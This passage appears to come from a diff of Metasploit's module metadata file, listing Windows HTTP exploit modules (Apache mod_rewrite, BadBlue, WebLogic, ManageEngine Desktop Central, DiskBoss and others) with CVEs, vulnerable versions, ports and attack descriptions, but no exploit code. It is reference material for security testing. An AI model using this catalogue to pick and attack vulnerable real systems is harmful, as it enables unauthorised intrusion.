the mod_rewrite LDAP protocol scheme handling\n flaw discovered by Mark Dowd, which produces an off-by-one overflow.\n Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.\n This module requires REWRITEPATH to be set accurately. 
In addition,\n the target must have 'RewriteEngine on' configured, with a specific\n 'RewriteRule' condition enabled to allow for exploitation.\n\n The flaw affects multiple platforms, however this module currently\n only supports Windows based installations.", + "references": [ + "CVE-2006-3747", + "OSVDB-27588", + "BID-19204", + "URL-http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html", + "EDB-3680", + "EDB-3996", + "EDB-2237" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb", + "is_install_path": true, + "ref_name": "windows/http/apache_mod_rewrite_ldap", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/apache_modjk_overflow": { + "name": "Apache mod_jk 1.2.20 Buffer Overflow", + "fullname": "exploit/windows/http/apache_modjk_overflow", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-03-02", + "type": "exploit", + "author": [ + "Nicob " + ], + "description": "This is a stack buffer overflow exploit for mod_jk 1.2.20.\n Should work on any Win32 OS.", + "references": [ + "CVE-2007-0774", + "OSVDB-33855", + "BID-22791", + "ZDI-07-008" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/apache_modjk_overflow.rb", + "is_install_path": true, + "ref_name": "windows/http/apache_modjk_overflow", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, 
+ "needs_cleanup": null + }, + "exploit_windows/http/apache_tika_jp2_jscript": { + "name": "Apache Tika Header Command Injection", + "fullname": "exploit/windows/http/apache_tika_jp2_jscript", + "aliases": [], + "rank": 600, + "disclosure_date": "2018-04-25", + "type": "exploit", + "author": [ + "h00die", + "David Yesland", + "Tim Allison" + ], + "description": "This module exploits a command injection vulnerability in Apache\n Tika 1.15 - 1.17 on Windows. A file with the image/jp2 content-type is\n used to bypass magic bytes checking. When OCR is specified in the\n request, parameters can be passed to change the parameters passed\n at command line to allow for arbitrary JScript to execute. A\n JScript stub is passed to execute arbitrary code. This module was\n verified against version 1.15 - 1.17 on Windows 2012.\n While the CVE and finding show more versions vulnerable, during\n testing it was determined only > 1.14 was exploitable due to\n jp2 support being added.", + "references": [ + "EDB-46540", + "URL-https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/", + "URL-https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E", + "CVE-2018-1335" + ], + "platform": "Windows", + "arch": "", + "rport": 9998, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows" + ], + "mod_time": "2021-02-17 12:33:59 +0000", + "path": "/modules/exploits/windows/http/apache_tika_jp2_jscript.rb", + "is_install_path": true, + "ref_name": "windows/http/apache_tika_jp2_jscript", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/avaya_ccr_imageupload_exec": { + "name": "Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution", + 
"fullname": "exploit/windows/http/avaya_ccr_imageupload_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-06-28", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits an authentication bypass vulnerability on Avaya IP Office\n Customer Call Reporter, which allows a remote user to upload arbitrary files\n through the ImageUpload.ashx component. It can be abused to upload and execute\n arbitrary ASP .NET code. The vulnerability has been tested successfully on Avaya IP\n Office Customer Call Reporter 7.0.4.2 and 8.0.8.15 on Windows 2003 SP2.", + "references": [ + "CVE-2012-3811", + "OSVDB-83399", + "BID-54225", + "URL-https://downloads.avaya.com/css/P8/documents/100164021", + "ZDI-12-106" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Avaya IP Office Customer Call Reporter 7.0 and 8.0 / Microsoft Windows Server 2003 SP2" + ], + "mod_time": "2019-08-02 09:48:53 +0000", + "path": "/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb", + "is_install_path": true, + "ref_name": "windows/http/avaya_ccr_imageupload_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/badblue_ext_overflow": { + "name": "BadBlue 2.5 EXT.dll Buffer Overflow", + "fullname": "exploit/windows/http/badblue_ext_overflow", + "aliases": [], + "rank": 500, + "disclosure_date": "2003-04-20", + "type": "exploit", + "author": [ + "acaro " + ], + "description": "This is a stack buffer overflow exploit for BadBlue version 2.5.", + "references": [ + "CVE-2005-0595", + "OSVDB-14238", + "BID-7387" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 
8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "BadBlue 2.5 (Universal)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/badblue_ext_overflow.rb", + "is_install_path": true, + "ref_name": "windows/http/badblue_ext_overflow", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/badblue_passthru": { + "name": "BadBlue 2.72b PassThru Buffer Overflow", + "fullname": "exploit/windows/http/badblue_passthru", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-12-10", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the PassThru\n functionality in ext.dll in BadBlue 2.72b and earlier.", + "references": [ + "CVE-2007-6377", + "OSVDB-42416", + "BID-26803" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "BadBlue EE 2.7 Universal", + "BadBlue 2.72b Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/badblue_passthru.rb", + "is_install_path": true, + "ref_name": "windows/http/badblue_passthru", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/bea_weblogic_jsessionid": { + "name": "BEA WebLogic JSESSIONID Cookie Value Overflow", + "fullname": "exploit/windows/http/bea_weblogic_jsessionid", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-01-13", + "type": "exploit", + "author": [ + "pusscat " + ], + "description": "This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable\n code is only accessible when clustering is configured. 
A request containing a\n long JSESSION cookie value can lead to arbitrary code execution.", + "references": [ + "CVE-2008-5457", + "OSVDB-51311" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Apache 2.2 - WebLogic module version 1.0.1136334", + "Windows Apache 2.2 - WebLogic module version 1.0.1150354" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/bea_weblogic_jsessionid.rb", + "is_install_path": true, + "ref_name": "windows/http/bea_weblogic_jsessionid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/bea_weblogic_post_bof": { + "name": "Oracle Weblogic Apache Connector POST Request Buffer Overflow", + "fullname": "exploit/windows/http/bea_weblogic_post_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-07-17", + "type": "exploit", + "author": [ + "KingCope", + "juan vazquez " + ], + "description": "This module exploits a stack based buffer overflow in the BEA\n Weblogic Apache plugin.\n\n The connector fails to properly handle specially crafted HTTP POST\n requests, resulting a buffer overflow due to the insecure usage\n of sprintf. 
Currently, this module works over Windows systems without DEP,\n and has been tested with Windows 2000 / XP.\n\n In addition, the Weblogic Apache plugin version is fingerprinted with a POST\n request containing a specially crafted Transfer-Encoding header.", + "references": [ + "CVE-2008-3257", + "OSVDB-47096", + "BID-30273" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]", + "BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]", + "BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/bea_weblogic_post_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/bea_weblogic_post_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/bea_weblogic_transfer_encoding": { + "name": "BEA Weblogic Transfer-Encoding Buffer Overflow", + "fullname": "exploit/windows/http/bea_weblogic_transfer_encoding", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-09-09", + "type": "exploit", + "author": [ + "pusscat " + ], + "description": "This module exploits a stack based buffer overflow in the BEA\n Weblogic Apache plugin. 
This vulnerability exists in the\n error reporting for unknown Transfer-Encoding headers.\n You may have to run this twice due to timing issues with handlers.", + "references": [ + "CVE-2008-4008", + "OSVDB-49283" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Apache 2.2 version Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb", + "is_install_path": true, + "ref_name": "windows/http/bea_weblogic_transfer_encoding", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/belkin_bulldog": { + "name": "Belkin Bulldog Plus Web Service Buffer Overflow", + "fullname": "exploit/windows/http/belkin_bulldog", + "aliases": [], + "rank": 200, + "disclosure_date": "2009-03-08", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Belkin Bulldog Plus\n 4.0.2 build 1219. 
When sending a specially crafted http request,\n an attacker may be able to execute arbitrary code.", + "references": [ + "OSVDB-54395", + "BID-34033", + "EDB-8173" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows XP SP3 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/belkin_bulldog.rb", + "is_install_path": true, + "ref_name": "windows/http/belkin_bulldog", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ca_arcserve_rpc_authbypass": { + "name": "CA Arcserve D2D GWT RPC Credential Information Disclosure", + "fullname": "exploit/windows/http/ca_arcserve_rpc_authbypass", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-07-25", + "type": "exploit", + "author": [ + "bannedit ", + "rgod" + ], + "description": "This module exploits an information disclosure vulnerability in the CA Arcserve\n D2D r15 web server. The information disclosure can be triggered by sending a\n specially crafted RPC request to the homepage servlet. This causes CA Arcserve to\n disclosure the username and password in cleartext used for authentication. 
This\n username and password pair are Windows credentials with Administrator access.", + "references": [ + "CVE-2011-3011", + "OSVDB-74162", + "EDB-17574" + ], + "platform": "Windows", + "arch": "", + "rport": 8014, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb", + "is_install_path": true, + "ref_name": "windows/http/ca_arcserve_rpc_authbypass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ca_igateway_debug": { + "name": "CA iTechnology iGateway Debug Mode Buffer Overflow", + "fullname": "exploit/windows/http/ca_igateway_debug", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-10-06", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a vulnerability in the Computer Associates\n iTechnology iGateway component. When True is enabled\n in igateway.conf (non-default), it is possible to overwrite the stack\n and execute code remotely. 
This module works best with Ordinal payloads.", + "references": [ + "CVE-2005-3190", + "OSVDB-19920", + "URL-http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485", + "EDB-1243", + "BID-15025" + ], + "platform": "Windows", + "arch": "", + "rport": 5250, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "iGateway 3.0.40621.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ca_igateway_debug.rb", + "is_install_path": true, + "ref_name": "windows/http/ca_igateway_debug", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ca_totaldefense_regeneratereports": { + "name": "CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection", + "fullname": "exploit/windows/http/ca_totaldefense_regeneratereports", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-04-13", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a SQL injection flaw in CA Total Defense Suite R12.\n When supplying a specially crafted soap request to '/UNCWS/Management.asmx', an\n attacker can abuse the reGenerateReports stored procedure by injecting arbitrary sql\n statements into the ReportIDs element.", + "references": [ + "ZDI-11-134", + "OSVDB-74968", + "CVE-2011-1653" + ], + "platform": "Windows", + "arch": "", + "rport": 34443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Universal" + ], + "mod_time": "2022-06-29 19:10:52 +0000", + "path": "/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb", + "is_install_path": true, + "ref_name": "windows/http/ca_totaldefense_regeneratereports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + 
}, + "exploit_windows/http/cayin_xpost_sql_rce": { + "name": "Cayin xPost wayfinder_seqid SQLi to RCE", + "fullname": "exploit/windows/http/cayin_xpost_sql_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-06-04", + "type": "exploit", + "author": [ + "h00die", + "Gjoko Krstic (LiquidWorm) " + ], + "description": "This module exploits an unauthenticated SQLi in Cayin xPost <=2.5. The\n wayfinder_meeting_input.jsp file's wayfinder_seqid parameter can be injected\n with a blind SQLi. Since this app bundles MySQL and apache Tomcat the\n environment is pretty static and therefore the default settings should\n work. Results in SYSTEM level access.\n Only the java/jsp_shell_reverse_tcp and java/jsp_shell_bind_tcp payloads\n seem to be valid.", + "references": [ + "EDB-48558", + "URL-https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php", + "CVE-2020-7356" + ], + "platform": "Java,Windows", + "arch": "java", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Target" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/http/cayin_xpost_sql_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/cayin_xpost_sql_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/cogent_datahub_command": { + "name": "Cogent DataHub Command Injection", + "fullname": "exploit/windows/http/cogent_datahub_command", + "aliases": [], + "rank": 0, + "disclosure_date": "2014-04-29", + "type": "exploit", + "author": [ + "John Leitch", + "juan vazquez " + ], + "description": "This module exploits an injection vulnerability in Cogent 
DataHub prior\n to 7.3.5. The vulnerability exists in the GetPermissions.asp page, which\n makes insecure use of the datahub_command function with user controlled\n data, allowing execution of arbitrary datahub commands and scripts. This\n module has been tested successfully with Cogent DataHub 7.3.4 on\n Windows 7 SP1. Please also note that after exploitation, the remote service\n will most likely hang and restart manually.", + "references": [ + "ZDI-14-136", + "CVE-2014-3789", + "BID-67486" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Cogent DataHub < 7.3.5" + ], + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/exploits/windows/http/cogent_datahub_command.rb", + "is_install_path": true, + "ref_name": "windows/http/cogent_datahub_command", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/cogent_datahub_request_headers_bof": { + "name": "Cogent DataHub HTTP Server Buffer Overflow", + "fullname": "exploit/windows/http/cogent_datahub_request_headers_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-07-26", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a stack based buffer overflow on Cogent DataHub 7.3.0. The\n vulnerability exists in the HTTP server. While handling HTTP headers, a\n strncpy() function is used in a dangerous way. 
This module has been tested\n successfully on Cogent DataHub 7.3.0 (Demo) on Windows XP SP3.", + "references": [ + "CVE-2013-0680", + "OSVDB-95819", + "BID-53455", + "ZDI-13-178", + "URL-http://www.cogentdatahub.com/Info/130712_ZDI-CAN-1915_Response.html" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows XP SP3 English / Cogent DataHub 7.3.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/cogent_datahub_request_headers_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/coldfusion_fckeditor": { + "name": "ColdFusion 8.0.1 Arbitrary File Upload and Execute", + "fullname": "exploit/windows/http/coldfusion_fckeditor", + "aliases": [], + "rank": 600, + "disclosure_date": "2009-07-03", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload\n and Execute vulnerability.", + "references": [ + "CVE-2009-2265", + "OSVDB-55684" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Universal Windows Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/coldfusion_fckeditor.rb", + "is_install_path": true, + "ref_name": "windows/http/coldfusion_fckeditor", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/cyclope_ess_sqli": { + 
"name": "Cyclope Employee Surveillance Solution v6 SQL Injection", + "fullname": "exploit/windows/http/cyclope_ess_sqli", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-08-08", + "type": "exploit", + "author": [ + "loneferret", + "sinn3r " + ], + "description": "This module exploits a SQL injection found in Cyclope Employee Surveillance\n Solution. Because the login script does not properly handle the user-supplied\n username parameter, a malicious user can manipulate the SQL query, and allows\n arbitrary code execution under the context of 'SYSTEM'.", + "references": [ + "OSVDB-84517", + "EDB-20393" + ], + "platform": "Windows", + "arch": "", + "rport": 7879, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Cyclope Employee Surveillance Solution v6.2 or older" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/cyclope_ess_sqli.rb", + "is_install_path": true, + "ref_name": "windows/http/cyclope_ess_sqli", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/desktopcentral_deserialization": { + "name": "ManageEngine Desktop Central Java Deserialization", + "fullname": "exploit/windows/http/desktopcentral_deserialization", + "aliases": [], + "rank": 500, + "disclosure_date": "2020-03-05", + "type": "exploit", + "author": [ + "mr_me", + "wvu " + ], + "description": "This module exploits a Java deserialization vulnerability in the\n getChartImage() method from the FileStorage class within ManageEngine\n Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.\n\n Quoting the vendor's advisory on fixed versions:\n\n \"The short-term fix for the arbitrary file upload vulnerability was\n released in build 10.0.474 on January 20, 2020. 
In continuation of\n that, the complete fix for the remote code execution vulnerability is\n now available in build 10.0.479.\"", + "references": [ + "CVE-2020-10189", + "URL-https://srcincite.io/advisories/src-2020-0011/", + "URL-https://srcincite.io/pocs/src-2020-0011.py.txt", + "URL-https://twitter.com/steventseeley/status/1235635108498948096", + "URL-https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 8383, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Dropper", + "PowerShell Stager" + ], + "mod_time": "2023-03-13 10:31:27 +0000", + "path": "/modules/exploits/windows/http/desktopcentral_deserialization.rb", + "is_install_path": true, + "ref_name": "windows/http/desktopcentral_deserialization", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "Reliability": [ + "first-attempt-fail" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/desktopcentral_file_upload": { + "name": "ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload", + "fullname": "exploit/windows/http/desktopcentral_file_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-11-11", + "type": "exploit", + "author": [ + "Thomas Hibbert " + ], + "description": "This module exploits an arbitrary file upload vulnerability in Desktop Central v7 to\n v8 build 80293. 
A malicious user can upload a JSP file into the web root without\n authentication, leading to arbitrary code execution as SYSTEM.", + "references": [ + "CVE-2013-7390", + "OSVDB-100008", + "URL-http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf", + "URL-https://seclists.org/fulldisclosure/2013/Nov/130" + ], + "platform": "Windows", + "arch": "x86", + "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Desktop Central v7 - v8 build 80292 / Windows" + ], + "mod_time": "2021-02-17 12:33:59 +0000", + "path": "/modules/exploits/windows/http/desktopcentral_file_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/desktopcentral_file_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/desktopcentral_statusupdate_upload": { + "name": "ManageEngine Desktop Central StatusUpdate Arbitrary File Upload", + "fullname": "exploit/windows/http/desktopcentral_statusupdate_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-08-31", + "type": "exploit", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits an arbitrary file upload vulnerability in ManageEngine DesktopCentral\n v7 to v9 build 90054 (including the MSP versions).\n A malicious user can upload a JSP file into the web root without authentication, leading to\n arbitrary code execution as SYSTEM. 
Some early builds of version 7 are not exploitable as\n they do not ship with a bundled Java compiler.", + "references": [ + "CVE-2014-5005", + "OSVDB-110643", + "URL-https://seclists.org/fulldisclosure/2014/Aug/88" + ], + "platform": "Windows", + "arch": "x86", + "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Desktop Central v7 to v9 build 90054 / Windows" + ], + "mod_time": "2021-02-17 12:33:59 +0000", + "path": "/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/desktopcentral_statusupdate_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/disk_pulse_enterprise_bof": { + "name": "Disk Pulse Enterprise Login Buffer Overflow", + "fullname": "exploit/windows/http/disk_pulse_enterprise_bof", + "aliases": [], + "rank": 600, + "disclosure_date": "2016-10-03", + "type": "exploit", + "author": [ + "Chris Higgins", + "Tulpa Security" + ], + "description": "This module exploits a stack buffer overflow in Disk Pulse Enterprise\n 9.0.34. If a malicious user sends a malicious HTTP login request,\n it is possible to execute a payload that would run under the Windows\n NT AUTHORITY\\SYSTEM account. 
Due to size constraints, this module\n uses the Egghunter technique.", + "references": [ + "EDB-40452" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Disk Pulse Enterprise 9.0.34" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/disk_pulse_enterprise_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/disk_pulse_enterprise_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/disk_pulse_enterprise_get": { + "name": "Disk Pulse Enterprise GET Buffer Overflow", + "fullname": "exploit/windows/http/disk_pulse_enterprise_get", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-08-25", + "type": "exploit", + "author": [ + "Chance Johnson", + "Nipun Jaswal & Anurag Srivastava" + ], + "description": "This module exploits an SEH buffer overflow in Disk Pulse Enterprise\n 9.9.16. 
If a malicious user sends a crafted HTTP GET request\n it is possible to execute a payload that would run under the Windows\n NT AUTHORITY\\SYSTEM account.", + "references": [ + "EDB-42560" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Disk Pulse Enterprise 9.9.16" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/disk_pulse_enterprise_get.rb", + "is_install_path": true, + "ref_name": "windows/http/disk_pulse_enterprise_get", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/diskboss_get_bof": { + "name": "DiskBoss Enterprise GET Buffer Overflow", + "fullname": "exploit/windows/http/diskboss_get_bof", + "aliases": [], + "rank": 600, + "disclosure_date": "2016-12-05", + "type": "exploit", + "author": [ + "vportal", + "Ahmad Mahfouz", + "Gabor Seljan", + "Jacob Robles" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server. 
